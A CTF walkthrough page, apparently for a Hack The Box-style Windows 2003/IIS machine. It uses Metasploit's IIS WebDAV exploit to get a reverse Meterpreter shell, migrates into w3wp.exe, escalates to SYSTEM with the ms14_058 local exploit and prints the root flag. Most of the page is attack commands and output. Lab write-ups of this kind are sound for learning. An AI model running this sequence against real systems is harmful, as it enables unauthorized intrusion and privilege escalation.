Exploitation

Metasploit Exploitation

msfconsole
use exploit/windows/iis/iis_webdav_scstoragepathfromurl

set RHOST 10.10.10.14
set LHOST tun0 
run

We have gotten a shell, unfortunatley, when we try to runn getuid it does not work and we get an error. This means we are running an unstable process. To fix this, we have to check what processes are running on the box and migrate to the one that is running with the same priveleges that the meterpreter session is running with.

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session  User                          Path
 ---   ----  ----               ----  -------  ----                          ----
 0     0     [System Process]                                                
 4     0     System                                                          
 276   4     smss.exe                                                        
 324   276   csrss.exe                                                       
 348   276   winlogon.exe                                                    
 396   348   services.exe                                                    
 408   348   lsass.exe                                                       
 584   396   svchost.exe                                                     
 680   396   svchost.exe                                                     
 740   396   svchost.exe                                                     
 764   396   svchost.exe                                                     
 800   396   svchost.exe                                                     
 936   396   spoolsv.exe                                                     
 964   396   msdtc.exe                                                       
 1084  396   cisvc.exe                                                       
 1104  1852  rundll32.exe       x86   0                                      C:\WINDOWS\system32\rundll32.exe
 1124  396   svchost.exe                                                     
 1180  396   inetinfo.exe                                                    
 1216  396   svchost.exe                                                     
 1324  396   VGAuthService.exe                                               
 1408  396   vmtoolsd.exe                                                    
 1456  396   svchost.exe                                                     
 1492  348   logon.scr                                                       
 1628  396   alg.exe                                                         
 1664  396   svchost.exe                                                     
 1796  584   wmiprvse.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 1852  1456  w3wp.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
 1916  396   dllhost.exe                                                     
 2304  584   wmiprvse.exe                                                    
 2692  584   davcdata.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
 3872  1084  cidaemon.exe                                                    
 3916  1084  cidaemon.exe                                                    
 3944  1084  cidaemon.exe

migrate 1852

Now we have a stable working meterpreter session. We have low privleges, however we need to Escalate to SYSTEM. Put the session in background and use local exploit suggestor local_exploit_suggester

search local_exploit_suggester
use local_exploit_suggester
set SESSION 1
run

msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 35 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

use exploit/windows/local/ms14_058_track_popup_menu
set SESSION 1
set LHOST tun0 
run
shell

meterpreter > shell
Process 1080 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>cd C:\Documents and Settings\Administrator
cd C:\Documents and Settings\Administrator

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings\Administrator\Desktop

04/12/2017  04:28 PM    <DIR>          .
04/12/2017  04:28 PM    <DIR>          ..
04/12/2017  04:29 PM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)  18,091,487,232 bytes free

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b
C:\Documents and Settings\Administrator\Desktop>

PreviousScanning and Enumeration NextLessons Learned

Last updated 5 years ago

Was this helpful?